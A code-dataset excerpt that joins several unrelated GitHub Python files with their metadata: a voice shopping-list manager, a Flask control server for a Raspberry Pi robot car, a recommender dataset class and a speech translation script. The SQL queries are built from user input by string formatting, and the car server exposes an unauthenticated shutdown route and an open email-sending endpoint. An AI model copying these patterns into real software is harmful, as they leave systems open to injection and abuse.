main.speak("What is the new name for the item?")
ITEM = main.listen().capitalize()
CATEGORY = result[2]
elif x == "CATEGORY":
ITEM = result[1]
main.speak(f"What is the new category for the item {ITEM}")
CATEGORY = main.listen().capitalize()
cursor.execute(f"UPDATE shopping_list SET Item = '{ITEM}', Category = '{CATEGORY}' WHERE ItemID = {update_item};")
conn.commit()
print(f"Item updated.")
main.speak("Item updated.")
break
def delete_item_from_list():
while True:
conn = db.create_connection()
cursor = conn.cursor()
print(pandas.read_sql_query("SELECT * from shopping_list", conn))
shop = cursor.execute("SELECT * from shopping_list;")
for item in shop:
main.speak(f"Item ID: {item[0]} Item: {item[1]}")
main.speak("What is the I.D. of the item?")
update_item = main.listen()
cursor.execute(f"DELETE FROM shopping_list WHERE ItemID = {update_item};")
conn.commit()
print("Item deleted")
main.speak("Item deleted.")
break
def get_shopping_list():
while True:
conn = db.create_connection()
cursor = conn.cursor()
sql_query = cursor.execute("SELECT * from shopping_list;")
results = sql_query.fetchall()
if len(results) == 0:
print("No items in list")
main.speak("There are no items in the shopping list.")
break
else:
for item in results:
print(f"{Style.YELLOW}ITEM:{Style.RESET} {item[1]} {Style.YELLOW}CATEGORY:{Style.RESET} {item[2]}")
main.speak(f"Item: {item[1]} Category: {item[2]}")
break | PhantomCaboose/Python-Virtual_Assistant | features/shopping_list.py | shopping_list.py | py | 3,773 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "db.db.create_connection",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "db.db",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "main.speak",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "main.listen",
"line_number... |
73632775228 | # dependencies module
from crypt import methods
import inspect, ctypes, os, socket
from logging import shutdown
import cv2 as CV
from threading import Thread
from dotenv import load_dotenv
from flask import Flask, render_template, request, Response, make_response, jsonify
from random import randint as rand
from flask_socketio import SocketIO, emit
from time import sleep
from datetime import datetime
from newstream import Camera as cam
# modules I have created
from Python.Sensors import *
from Python.sendEmail import sendMail
from Python.ReadVoltages import Adc
from Python.Buzzer import buzzer
from Python.Ultrasonic import Ultrasonic as lt
# Freenove modules but i modified them more explanation are givin on week Five
# https://securityguardjohnmuller.netlify.app/#weekNumFive
# the original code is on
# https://github.com/Freenove/Freenove_4WD_Smart_Car_Kit_for_Raspberry_Pi
from Python.Motor import Motor
from Python.servo import Servo
from Python.led import Led
from Python.Video import VideoStreaming
# create new instance of modules
wheelMotor = Motor()
servoMotor = Servo()
lineTracking = LineTracking()
lightTracking = Light()
batteryInfo = Adc()
newLed = Led()
lightTracking = Light()
ultrasonicSensor = Ultrasonic()
newLineTracking = LineTracking()
videoCapture = CV.VideoCapture(0)
newUltraSonic = lt
# get environment variables
load_dotenv()
serverEmail = os.getenv("ADMIN_EMAIL")
serverPassword = os.getenv("ADMIN_PASSWORD")
# initial and declare variables
maxServoValue = 180
minServoValue = 0
userName = None
serverThreads = []
LEDsThreads = []
sensorsThreads = []
socketConnection = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
socketConnection.connect(("1.1.1.1", 0))
IPAddress = socketConnection.getsockname()[0]
receiverEmailAddress = "Godsaveme2001@gmail.com"
# this this variable changes when the page loads first time and send an email before its status changes
# the reason if it so it send an email when the server starts but not on every re/load
serverHasStarted = os.getenv("serverHasStarted")
pageAlreadyAccessedStarted = os.getenv("pageAlreadyAccessedStarted")
objectsDistance = 0
rightSensorReadings = 0
leftSensorReadings = 0
# get current time for email status
currentTime = datetime.now().strftime("%H:%M:%S")
currentDate = datetime.now().date()
def Color(red, green, blue, white=0):
"""_summary_
this function Convert the provided red, green, blue color to a 24-bit color value.
Each color component should be a value 0-255 where 0 is the lowest intensity
and 255 is the highest intensity.
Args:
red (_int_): _description_ RGB color value between 0 and 255
green (_int_): _description_ RGB color value between 0 and 255
blue (_int_): _description_. RGB color value between 0 and 255
white (int, optional): _description_. Defaults to 0.
Returns:
_int_: _description_. it returns 24 bit color value
"""
return (white << 24) | (red << 16) | (green << 8) | blue
def asyncRaise(thread, executeType):
"""_summary_
this function destroy the thread given thread id if the executeType == system exit
Args:
thread (_integer_): _description_
the thread initialized id thread.ident
executeType (_object_): _description_
SystemExit specifies what to do with the the thread
Raises:
ValueError: _description_
SystemError: _description_
"""
threadIndent = ctypes.c_long(thread)
if not inspect.isclass(executeType):
executeType = type(executeType)
result = ctypes.pythonapi.PyThreadState_SetAsyncExc(
threadIndent, ctypes.py_object(executeType)
)
if result == 0:
raise ValueError("invalid thread id")
elif result != 1:
ctypes.pythonapi.PyThreadState_SetAsyncExc(threadIndent, None)
raise SystemError("PyThreadState_SetAsyncExc failed")
def killThread(Threads):
"""_summary_
this function kills the given thread(s)
and removes it from the given list
Args:
Threads (_list_): _description_
get an array of threads
"""
if len(Threads) != 0:
for thread in Threads:
try:
asyncRaise(thread.ident, SystemExit)
Threads.remove(thread)
print(f"{thread} has been stopped") # for testing purposes
except ValueError as error:
print(f"an error occur : \n{error}")
def getTemperature():
"""_summary_
this function gets CPU readings from the terminal and formats it to
get only the float number and returns it
Returns:
_float_: _description_
returns CPU Temperature as a float type
"""
# Read data from Raspberry Pi (specifically read CPU temperature)
temperature = os.popen("/opt/vc/bin/vcgencmd measure_temp").read()
return format(temperature[5:-3])
def getBatteryPercentage():
"""_summary_
this function get voltages readings and converts it to percentage and returns it as integer value
Returns:
_int_: _description_
returns Battery Percentage as an integer
"""
batteryValue = batteryInfo.recvADC(2)
batteryValue = batteryValue / 1.4 * 30
print(batteryValue)
return int(batteryValue)
def colorAnimation(MODE="string"):
"""_summary_
this is a while True function gets executed in the background by calling it via
thread it plays a random LEDs animation
____used like____
calling it inside thread as [ <MODE>Animation = Thread(target=colorAnimation, args("MODE=<MODE>",)) ]
then start it when needed as <MODE>Animation.start()
Args:
MODE (_str_): _description_
___Available MODEs___
MODE == "RGB" it plays RGB animations
MODE == "Random" it plays RGB animations
MODE == "Cycle" it plays RGB animations
MODE == "Animation" it plays RGB animations
MODE == "Rainbow" it plays RGB animations
"""
if MODE == "RGB":
while True:
newLed.customRGB(newLed.strip)
elif MODE == "Random":
while True:
newLed.rainbowCycle(newLed.strip)
elif MODE == "Cycle":
while True:
newLed.customRandomAnimation(newLed.strip)
elif MODE == "Rainbow":
while True:
newLed.rainbow(newLed.strip)
elif MODE == "Animation":
while True:
newLed.theaterChaseRainbow(newLed.strip)
else:
# the below function just for good practice code
print("not supported mode")
return None
def ultrasonicBackground():
"""_summary_
this is a while True function gets execute in the background by calling it via
thread
it gets objects distance reading and stores it in a global variables
____like____
calling it inside thread as [ ultrasonicThread = Thread(target=ultrasonicBackground) ]
then start it when needed as ultrasonicThread.start()
"""
global objectsDistance
while True:
objectsDistance = ultrasonicSensor.getDistance()
sleep(0.5)
# declare a thread and append it to threads list
ultrasonicThread = Thread(target=ultrasonicBackground)
serverThreads.append(ultrasonicThread)
sensorsThreads.append(ultrasonicThread)
def lightSensorReadingsBackground():
"""_summary_
this is a while True function gets execute in the background by calling it via
thread
it gets left and right sensor reading and stores it in a global variables
____like____
calling it inside thread as [ lightSensorsThread = Thread(target=lightSensorReadingsBackground) ]
then start it when needed as lightSensorsThread.start()
"""
global leftSensorReadings
global rightSensorReadings
while True:
leftSensorReadings = batteryInfo.recvPCF8591(0)
rightSensorReadings = batteryInfo.recvPCF8591(2)
sleep(0.5)
# print(leftSensorReadings, rightSensorReadings) # for testing purposes
# declare a thread and append it to threads list
lightSensorsThread = Thread(target=lightSensorReadingsBackground)
serverThreads.append(lightSensorsThread)
sensorsThreads.append(lightSensorsThread)
# destroy all components and send an email
def destroy(Error, shutDown=False):
"""_summary_
Args:
Error (_String/None_): _description_
this function makes sure that the server closed correctly and all
components and threads are set to their default values and send an email that server
has closed manually if Error parameter has value will change such as error exception
the subject and body of the email will change
other wise if Error is set to None the default email will be sent
"""
# send an email that says server is down
isAnErrorOccur = Error != None
if isAnErrorOccur:
messageSubject = "an error occur"
messageBody = f"unexpected error occur cause the server to shutdown at {currentTime}\nThe error was\n{Error}"
else:
messageSubject = "Server went down"
messageBody = (
f"server shutdown manually at {currentTime} all looks good!{Error}"
)
# send email with server status
sendMail(
subject=messageSubject,
receiver=receiverEmailAddress,
body=messageBody,
email=serverEmail,
password=serverPassword,
)
# wait two 1 after email has
sleep(1)
# Stop all wheels
wheelMotor.setMotorModel(0, 0, 0, 0)
# set servo motor one(1) Left right to center
servoOneUpDownCurrentValue = 90
servoMotor.setServoPwm("1", servoOneUpDownCurrentValue)
# set servo motor Zero(0) Left right to center
servoZeroRightLeftCurrentValue = 90
servoMotor.setServoPwm("0", servoZeroRightLeftCurrentValue)
# turn buzzer off
buzzer(False, False, False)
# make sure that the enviorment varibles are set to defults value
os.environ["pageAlreadyAccessedStarted"] = "False"
os.environ["serverHasStarted"] = "False"
# destroy / turn off the LEDs
newLed.colorWipe(newLed.strip, Color(0, 0, 0), 10)
# make sure that all threads are exited / stopped
killThread(serverThreads)
# wait 1 second to make sure that all threads has been stopped
sleep(1)
# if shutdown requested via the user close the server
if shutDown:
os.system("sudo shutdown now")
# then exit / close the programme
exit()
try:
# setting flask server as a single module by setting __name__
# setting template and statics folder so flask sever knows where to look for resources
app = Flask(__name__, template_folder="Templates", static_folder="Static")
# socketio = SocketIO(app, async_mode=None)
# when server starts send an email with it's current ip address
if serverHasStarted == "False":
# for testing purposes
print("Server Running... ")
# to let the user knows that server has started
for _ in range(4):
# turn buzzer on
buzzer(status=True)
newLed.colorWipe(255.166, 99)
buzzer(status=False)
sleep(0.25)
newLed.colorWipe(0.0, 0)
sendMail(
subject="Server has started",
receiver=receiverEmailAddress,
body=f"""Hey, this is the smart car auto mail system\nThe Server has started running on http://{IPAddress}:5500/\nat {currentTime} - {currentDate} everything looks fine! """,
password=serverPassword,
email=serverEmail,
)
os.environ["serverHasStarted"] = "True"
# when host is loaded return to app page index
# and receive data from it
@app.route("/", methods=["POST", "GET"])
def index():
global userName
# credentials = request.get_data()
# password == credentials["password"]
# email == credentials["email"]
# if password == os.environ[str(password)] and email == os.environ[str(email)]
# userName = os.environ[str(email) + "userName"]
# if page is not accessed after server has started running send an email
if pageAlreadyAccessedStarted == "False":
sendMail(
subject="Server has accessed",
receiver=receiverEmailAddress,
body=f"Hey, this is the smart car auto mail system\nThe Server has accessed at {currentTime} by {userName} \n everything looks fine! ",
password=serverPassword,
email=serverEmail,
)
# change the env value
os.environ["pageAlreadyAccessedStarted"] = "True"
return render_template("app.html")
# send CPU and power data to the client
# get other objects distance
@app.route("/data/<type>")
def sendData(type):
userName = " John Muller"
data = {
"username": userName,
"Temperature": getTemperature(), # CPU Temperature
"power": getBatteryPercentage(), # Battery info
"dataDistance": objectsDistance,
"roomTemperature": rand(0, 150),
}
if type == "All":
response = make_response(jsonify(data))
return response
elif type == "Light":
lightSensorData = data["rightSensorReadings": rightSensorReadings,
"leftSensorReadings": leftSensorReadings]
# start reading light distance
lightSensorsThread.start()
lightSensorsThread.join()
response = make_response(jsonify(lightSensorData))
return response
elif type == "distance":
# start reading objects distance
ultrasonicThread.start()
ultrasonicThread.join()
else:
# stopping only these two
killThread(sensorsThreads)
return render_template("app.html")
def captureAnImage():
"""_summary_
this is an infinite function that capture an image and stores it in the PWD directory
then returns the captured image
Yields:
_byte_: _description_ return image data JPEG data in JFIF or Exif formats
"""
while True:
frame = cam.get_frame()
CV.imwrite("pic.jpg", frame)
yield (
b"--frame\r\n"
b"Content-Type: image/jpeg\r\n\r\n" + frame + b"\r\n"
)
@app.route("/videoStream")
def videoStream():
return Response(
captureAnImage(), mimetype="multipart/x-mixed-replace; boundary=frame"
)
# wheel directions and buzzer route
# this route is created to move the car according to the requested value
@app.route("/wheel/<direction>")
# create a function that checks the direction and call wheelMotor function
# to set the wheels and move the car according the given direction
def wheelDirections(direction):
# wheel button is clicked in the frontend (user's interface)
# Do the following
# if objectsDistance >= 20:
# if direction is set to forward
if direction == "forward":
# moving the car forward
# set all wheels value negative so the car moves forward
wheelMotor.setMotorModel(-2000, -2000, -2000, -2000)
# the below function is { return render_template("app.html")} doing nothing in this case
# because in the front end i am not sending request to get new page so the page
# do not refresh
# i just did it so it does not give an error
# also if the user hit to the directory for example host/wheel/forward the flask server will
# redirecting the user to app page but the wheel will keep running and that what wheel happen if i sent
# GET request like "host/wheel/forward"
# i can return none but the flask server will give a warning
# and if i return text like "car is moving forward" it will go to a new page showing the text and it's not
# effecting way
# more explanation are given on week four "https://securityguardjohnmuller.netlify.app/#weekNumFour"
return render_template("app.html")
# if direction is set to backward
elif direction == "backward":
# moving the car forward
# set all wheels value positive so the car moves backward
wheelMotor.setMotorModel(2000, 2000, 2000, 2000)
return render_template("app.html")
# if direction is set to left
elif direction == "left":
# turning the car to the left
# set the left wheels value positive and lower than the right wheels so the car turn to the left
wheelMotor.setMotorModel(-1500, -1500, 1500, 1500)
return render_template("app.html")
# if direction is set to right
elif direction == "right":
# turning the car to the left
# set the right wheels value negative and lower than the left wheels so the car turn to the right
wheelMotor.setMotorModel(1500, 1500, -1500, -1500)
return render_template("app.html")
# if direction is set to buzzer
elif direction == "buzzer":
# turn buzzer on
buzzer(True)
return render_template("app.html")
# if direction is set to stop or anything else
else:
# make sure that wheels are set to zero
wheelMotor.setMotorModel(0, 0, 0, 0)
# and buzzer is turned on
buzzer(False)
# if the user hard coded a the url for example host/wheel/example
# but in my case i am sending stop when button reveals or not clicked
# more explanation are given on week four "https://securityguardjohnmuller.netlify.app/#weekNumFour"
return "invalid request"
# else:
# wheelMotor.setMotorModel(0, 0, 0, 0)
# buzzer(False)
# return render_template("app.html")
# servo directions route
@app.route("/servo/<directionURL>", methods=["POST"])
def servoDirections(directionURL):
# get value from the clint side and store it in a variable
currentDirectionValue = request.get_json()
# print(currentDirectionValue) # for testing purposes
if (
# check if the current value is between the minimum and maximum value
# if value is not in between min and max the function will return invalid request
# the below code is to double check so if someone has make changes on the clint side it won't effect in her
currentDirectionValue >= minServoValue
and currentDirectionValue <= maxServoValue
):
# the upper (left right)servo motor has address is 0
# the bottom (up and down ) servo motor has address 1
# if direction url is "example" will move to it's given direction
if directionURL == "up":
servoMotor.setServoPwm("1", currentDirectionValue)
return render_template("app.html")
elif directionURL == "right":
servoMotor.setServoPwm("0", currentDirectionValue)
return render_template("app.html")
elif directionURL == "down":
servoMotor.setServoPwm("1", currentDirectionValue)
return render_template("app.html")
elif directionURL == "left":
servoMotor.setServoPwm("0", currentDirectionValue)
return render_template("app.html")
else:
servoMotor.setServoPwm("1", 90)
servoMotor.setServoPwm("0", 90)
return render_template("app.html")
else:
return "invalid request please try again "
# send Email Route
@app.route("/Email/<Type>", methods=["POST", "GET"])
def sendEmail(Type):
# when user press on send email if method equal to "POST"
# the data will be sent to the given gmail with it's body
# but the subject is initialed in here
if Type == "POST":
data = request.get_json()
sendMail(
subject="Smart car mail system",
receiver=data["receiver"],
body=data["body"],
password=serverPassword,
email=serverEmail,
)
# if method == "GET" then the system summary message will be sent
elif Type == "GET":
sendMail(
subject="Smart car summary",
receiver=receiverEmailAddress,
body=f"""Hey, this is the smart car auto mail system\n
everything looks fine!{currentTime}\n
one accessed user: {userName}\n
everything looks fine!""",
password=serverPassword,
email=serverEmail,
attachment=True,
)
# LEDs route
@app.route("/LEDs/<stripType>/<LEDStatus>", methods=["POST", "GET"])
def LEDs(stripType, LEDStatus):
if stripType != "single":
# make sure that the animation Mode is switched off
killThread(LEDsThreads)
# make sure that the all LEDs are switched off
sleep(0.5)
newLed.colorWipe(newLed.strip, Color(0, 0, 0), 10)
if stripType == "RGB" and LEDStatus == "on":
RGBModeThread = Thread(target=colorAnimation, args=("RGB",))
serverThreads.append(RGBModeThread)
LEDsThreads.append(RGBModeThread)
print(
"RGB animation mode thread has started!.."
) # for testing purposes
RGBModeThread.start()
elif stripType == "chaserAnimation" and LEDStatus == "on":
theaterChaseRainbow = Thread(target=colorAnimation, args=("Animation",))
serverThreads.append(theaterChaseRainbow)
LEDsThreads.append(theaterChaseRainbow)
print(
"Chaser animation mode thread has started!.."
) # for testing purposes
theaterChaseRainbow.start()
elif stripType == "rainbow" and LEDStatus == "on":
rainbow = Thread(target=colorAnimation, args=("Rainbow",))
serverThreads.append(rainbow)
LEDsThreads.append(rainbow)
print(
"Rainbow animation mode thread has started!.."
) # for testing purposes
rainbow.start()
elif stripType == "cycle" and LEDStatus == "on":
rainbowCycle = Thread(target=colorAnimation, args=("Cycle",))
serverThreads.append(rainbowCycle)
LEDsThreads.append(rainbowCycle)
print(
"Cycle animation mode thread has started!.."
) # for testing purposes
rainbowCycle.start()
elif stripType == "randomColors" and LEDStatus == "on":
randomAnimation = Thread(target=colorAnimation, args=("Random",))
serverThreads.append(randomAnimation)
LEDsThreads.append(randomAnimation)
print(
"Cycle animation mode thread has started!.."
) # for testing purposes
randomAnimation.start()
return render_template("app.html")
elif stripType == "single" and LEDStatus == "on":
data = request.get_json()
print(data) # for testing purposes
index = int(data["index"])
RGB = data["RGB"]
print(f"type of {index} is {type(index)}") # for testing purposes
newLed.ledIndex(index, RGB["R"], RGB["G"], RGB["B"])
return render_template("app.html")
elif stripType == "single" and LEDStatus == "off":
data = request.get_json()
index = int(data["index"])
newLed.ledIndex(index, 0, 0, 0)
return render_template("app.html")
else:
# destroy / turn off the LEDs
killThread(LEDsThreads) # to kill the thread
# to make sure that all LEDs are low / turned off
return "invalid request"
# Sensor mode route
@app.route("/sensor/<sensorType>/<modeStatus>")
def sensors(sensorType, modeStatus):
if modeStatus == "start":
# make sure that the previous modes / threads has been stopped
killThread(sensorsThreads)
# also make sure that wheels are set to 0 if the thread exited and the pins are set to high
wheelMotor.setMotorModel(0, 0, 0, 0)
if sensorType == "ultraSonic":
ultrasonicModeThread = Thread(target=newUltraSonic.run)
sensorsThreads.append(ultrasonicModeThread)
serverThreads.append(ultrasonicModeThread)
print("ultrasonic mode thread has started!...") # for testing purposes
ultrasonicModeThread.start()
return render_template("app.html")
elif sensorType == "lineTracking":
lineTrackingModeThread = Thread(target=newLineTracking.run)
sensorsThreads.append(lineTrackingModeThread)
serverThreads.append(lineTrackingModeThread)
print(
"line tracking mode thread has started!..."
) # for testing purposes
lineTrackingModeThread.start()
return render_template("app.html")
elif sensorType == "lightTracking":
lightTrackingModeThread = Thread(target=lightTracking.run)
sensorsThreads.append(lightTrackingModeThread)
serverThreads.append(lightTrackingModeThread)
lightTrackingModeThread.start()
return render_template("app.html")
elif sensorType == "faceTracking1":
# TODO this code not ready because i am waiting for the camera
faceTrackingModeThread = Thread(target=VideoStreaming.face_detect.run)
sensorsThreads.append(faceTrackingModeThread)
serverThreads.append(faceTrackingModeThread)
faceTrackingModeThread.start()
return render_template("app.html")
else:
killThread(sensorsThreads)
return render_template("app.html")
# if user press on close button and confirm that they sure
# close server
@app.route("/server/disconnect")
def shutServerDown():
destroy(Error=None, shutDown=True)
# this return is not getting returned but flask server keeps giving me an error
return "System went down "
if __name__ == "__main__":
app.run(debug=True, host="0.0.0.0", port=5500, threaded=True)
except Exception as errorException:
print("an error occurred\n", errorException) # for testing purposes
buzzer(
status=True, anErrorOccur=True
) # to let the user know that there is an error
destroy(errorException) # make sure that all components are set to low/destroyed
except KeyboardInterrupt:
print("Keyboard Interrupt") # for testing purposes
destroy(None)
finally:
print("finally") # for testing purposes
destroy(None)
| John11Dark/SecurityGuard | Assets/SVG/Smart_Car_Server/app.py | app.py | py | 27,452 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "Python.Motor.Motor",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "Python.servo.Servo",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "Python.ReadVoltages.Adc",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "Python.... |
26213405914 | from typing import Generator, Any
import numpy as np
import pandas as pd
from sklearn.model_selection import GroupKFold
from sklearn.preprocessing import LabelEncoder, OrdinalEncoder
from hw2.datasets.base import Dataset
class TrainDataset(Dataset):
def reduce_by_members(self, size: int, inplace: bool = False) -> "TrainDataset":
if not inplace:
dataset = TrainDataset(self._df).reduce_by_members(size, inplace=True)
return dataset
self._df = self._df.groupby("msno").head(size).reset_index(drop=True)
return self
def remove_by_mask(self, mask, inplace: bool = False) -> "TrainDataset":
if not inplace:
dataset = TrainDataset(self._df).remove_by_mask(mask, inplace=True)
return dataset
self._df = self._df[~mask]
return self
def sort_by(self, column: str, inplace: bool = False) -> "TrainDataset":
if not inplace:
dataset = TrainDataset(self._df).sort_by(column, inplace=True)
return dataset
self._df = self._df.sort_values(by="msno")
return self
def group_split(self, n_splits: int) -> Generator:
# Not used anymore. Split by query.
group_kfold = GroupKFold(n_splits=n_splits)
# df_sorted = self._df.sort_values(by="msno")
data = self._df.drop("target", axis=1)
groups = data.msno.cat.codes.to_numpy()
for train_index, test_index in group_kfold.split(data, groups=groups):
train_dataset = TrainDataset(self._df.iloc[train_index])
test_dataset = TrainDataset(self._df.iloc[test_index])
yield train_dataset, test_dataset
def split(self, n_splits: int, random_state: int) -> Generator:
np.random.seed(random_state)
splits = np.array_split(np.random.permutation(len(self._df)), n_splits)
for i in range(n_splits):
train_index = np.hstack([splits[j] for j in range(n_splits) if j != i])
test_index = splits[i]
train_dataset = self._df.iloc[sorted(train_index)].reset_index(drop=True)
test_dataset = self._df.iloc[sorted(test_index)].reset_index(drop=True)
# Remove leaks. Too long :(
cols = ["msno", "song_id"]
mask_2d = np.isin(test_dataset[cols], train_dataset[cols])
test_dataset = test_dataset[~np.all(mask_2d, axis=1)]
yield TrainDataset(train_dataset), TrainDataset(test_dataset)
def add_features(self, name: str, values: Any):
self._df[name] = values
def drop_features(self, name: str):
self._df = self._df.drop(columns=name)
@property
def queries(self) -> np.ndarray:
return self._df.msno.cat.codes.to_numpy()
@property
def labels(self) -> np.ndarray:
return self._df.target.to_numpy()
@staticmethod
def from_path(path: str) -> "TrainDataset":
df = pd.read_csv(path, dtype={
"msno": "category",
"song_id": "category",
"source_system_tab": "category",
"source_screen_name": "category",
"source_type": "category",
"target": np.int})
return TrainDataset(df)
| Sushentsev/recommendation-systems | hw2/datasets/train.py | train.py | py | 3,215 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "hw2.datasets.base.Dataset",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "sklearn.model_selection.GroupKFold",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "typing.Generator",
"line_number": 36,
"usage_type": "name"
},
{
"api... |
9803009738 | from __future__ import division
from pydub.utils import make_chunks
import re
import sys
from google.cloud import speech
import pyaudio
from six.moves import queue
from io import BytesIO
from pydub import AudioSegment
from multiprocessing import Process
# You can choose voices from https://cloud.google.com/text-to-speech/docs/voices
voice_choice = "en-US-Wavenet-F"
output_lang_code = re.search("[a-z]{2,3}-[A-Z]{2}", voice_choice).group()
# Audio recording parameters
RATE = 16000
CHUNK = int(RATE / 10) # 100ms
# You can use PyAudio to find the right index for the device you'd like to use
output_device_index = 11
def synthesize_text(text):
"""Synthesizes speech from the input file of text."""
from google.cloud import texttospeech
client = texttospeech.TextToSpeechClient()
input_text = texttospeech.SynthesisInput(text=text)
# Note: the voice can also be specified by name.
# Names of voices can be retrieved with client.list_voices().
voice = texttospeech.VoiceSelectionParams(
language_code=output_lang_code, name=voice_choice
)
audio_config = texttospeech.AudioConfig(
audio_encoding=texttospeech.AudioEncoding.MP3
)
response = client.synthesize_speech(
request={"input": input_text, "voice": voice, "audio_config": audio_config}
)
# The response's audio_content is binary.
fp = BytesIO()
fp.write(response.audio_content)
fp.seek(0)
song = AudioSegment.from_file(fp, format="mp3")
play_from_device(song, output_device_index)
class MicrophoneStream(object):
"""Opens a recording stream as a generator yielding the audio chunks."""
def __init__(self, rate, chunk):
self._rate = rate
self._chunk = chunk
# Create a thread-safe buffer of audio data
self._buff = queue.Queue()
self.closed = True
def __enter__(self):
self._audio_interface = pyaudio.PyAudio()
self._audio_stream = self._audio_interface.open(
format=pyaudio.paInt16,
# The API currently only supports 1-channel (mono) audio
# https://goo.gl/z757pE
channels=1,
rate=self._rate,
input=True,
frames_per_buffer=self._chunk,
# Run the audio stream asynchronously to fill the buffer object.
# This is necessary so that the input device's buffer doesn't
# overflow while the calling thread makes network requests, etc.
stream_callback=self._fill_buffer,
)
self.closed = False
return self
def __exit__(self, type, value, traceback):
self._audio_stream.stop_stream()
self._audio_stream.close()
self.closed = True
# Signal the generator to terminate so that the client's
# streaming_recognize method will not block the process termination.
self._buff.put(None)
self._audio_interface.terminate()
def _fill_buffer(self, in_data, frame_count, time_info, status_flags):
"""Continuously collect data from the audio stream, into the buffer."""
self._buff.put(in_data)
return None, pyaudio.paContinue
def generator(self):
while not self.closed:
# Use a blocking get() to ensure there's at least one chunk of
# data, and stop iteration if the chunk is None, indicating the
# end of the audio stream.
chunk = self._buff.get()
if chunk is None:
return
data = [chunk]
# Now consume whatever other data's still buffered.
while True:
try:
chunk = self._buff.get(block=False)
if chunk is None:
return
data.append(chunk)
except queue.Empty:
break
yield b"".join(data)
# modified from pydub's _play_with_pyaudio
def play_from_device(seg, device_index):
p = pyaudio.PyAudio()
stream = p.open(format=p.get_format_from_width(seg.sample_width),
channels=seg.channels,
rate=seg.frame_rate,
output=True,
output_device_index=device_index)
# Just in case there were any exceptions/interrupts, we release the resource
# So as not to raise OSError: Device Unavailable should play() be used again
try:
# break audio into half-second chunks (to allows keyboard interrupts)
for chunk in make_chunks(seg, 500):
stream.write(chunk._data)
finally:
stream.stop_stream()
stream.close()
p.terminate()
def listen_print_loop(responses):
"""Iterates through server responses and prints them.
The responses passed is a generator that will block until a response
is provided by the server.
Each response may contain multiple results, and each result may contain
multiple alternatives; for details, see https://goo.gl/tjCPAU. Here we
print only the transcription for the top alternative of the top result.
In this case, responses are provided for interim results as well. If the
response is an interim one, print a line feed at the end of it, to allow
the next result to overwrite it, until the response is a final one. For the
final one, print a newline to preserve the finalized transcription.
"""
num_chars_printed = 0
for response in responses:
if not response.results:
continue
# The `results` list is consecutive. For streaming, we only care about
# the first result being considered, since once it's `is_final`, it
# moves on to considering the next utterance.
result = response.results[0]
if not result.alternatives:
continue
# Display the transcription of the top alternative.
transcript = result.alternatives[0].transcript
# Display interim results, but with a carriage return at the end of the
# line, so subsequent lines will overwrite them.
#
# If the previous result was longer than this one, we need to print
# some extra spaces to overwrite the previous result
overwrite_chars = " " * (num_chars_printed - len(transcript))
if not result.is_final:
sys.stdout.write(transcript + overwrite_chars + "\r")
sys.stdout.flush()
num_chars_printed = len(transcript)
else:
print(transcript + overwrite_chars)
p2 = Process(target=synthesize_text(transcript + overwrite_chars))
p2.start()
num_chars_printed = 0
def main():
# See http://g.co/cloud/speech/docs/languages
# for a list of supported languages.
input_lang_code = "en-US" # a BCP-47 language tag
client = speech.SpeechClient()
config = speech.RecognitionConfig(
encoding=speech.RecognitionConfig.AudioEncoding.LINEAR16,
sample_rate_hertz=RATE,
language_code=input_lang_code,
)
streaming_config = speech.StreamingRecognitionConfig(
config=config, interim_results=True
)
with MicrophoneStream(RATE, CHUNK) as stream:
audio_generator = stream.generator()
requests = (
speech.StreamingRecognizeRequest(audio_content=content)
for content in audio_generator
)
responses = client.streaming_recognize(streaming_config, requests)
# Now, put the transcription responses to use.
listen_print_loop(responses)
if __name__ == "__main__":
main() | EHowardHill/speak-easy | basic-runtime.py | basic-runtime.py | py | 7,631 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "re.search",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "google.cloud.texttospeech.TextToSpeechClient",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "google.cloud.texttospeech",
"line_number": 28,
"usage_type": "name"
},
{
"... |
25945686355 | #!/usr/bin/env python
# coding=utf-8
# author = ruiruige
# email = whx20202@gmail.com
import web
from jx3wj.common.rest.rest_base import resources
from jx3wj.common.rest.dto.dto import deco_dump_to_str
from jx3wj.common.log import log as logging
from jx3wj.common.db.crud import select
from jx3wj.common.db.do.item import Item
from jx3wj.common.db.do.base_do import Base_do
from jx3wj.common.utils.web_utils import not_found_utils
from jx3wj.common.utils.web_utils import redirect_utils
from jx3wj.common.rest.response_control import assemble_response
from jx3wj.mgmt.items import items_view
LOG = logging.getLogger(__name__)
# 这两段放在前面以便被引用到
# 处理api相关的url
api_urls = (
"/items", "items"
)
# api相关的子应用
api_app = web.application(api_urls, locals())
# url入口点
urls = (
# 要按顺序,否则"/api/items"这种请求,就走"/"不走"/api"了
"/api", api_app,
"(.*)", not_found_utils.not_found_app,
"/", items_view.app,
"", redirect_utils.add_backslash_app,
)
class reitems(object):
def GET(self):
raise web.seeother('/')
class items(resources):
@assemble_response
@Base_do.deco_sqlalchemy_obj_to_dict
@resources.manage_rest_api()
def GET(self):
rst = select(cls=Item)
return rst
def before_response(self, session=None):
"""Do some preparations before response to the REST request.
inherited from super, This function is run before the doGet doPost etc is run.
:see: super.before_response
:raises: None
"""
cls_name = self.__class__.__name__
# 类的初始化顺序遵循MRO(Method Resolution Order),即方法解析序列
super(items, self).__init__()
LOG.debug("running before_response of class : %s" % cls_name)
# 入口点应用
app = web.application(urls, locals())
| ruiruige/myifttt | myifttt/mgmt/items/items.py | items.py | py | 1,893 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "jx3wj.common.log.log.getLogger",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "jx3wj.common.log.log",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "web.application",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "j... |
41464656819 | #! python3
# -*- coding: utf-8 -*-
import datetime
start_bench_no_bench = datetime.datetime.now()
__version__ = "8.2.8-alpha"
import os
import sys
import copy
import platform
import pkgutil
